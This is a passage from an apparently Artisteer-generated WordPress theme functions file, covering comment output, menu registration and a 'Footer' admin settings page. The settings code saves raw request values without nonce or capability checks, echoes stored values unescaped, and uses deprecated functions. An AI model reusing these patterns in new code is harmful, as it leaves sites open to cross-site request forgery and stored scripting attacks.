		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Save changes" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
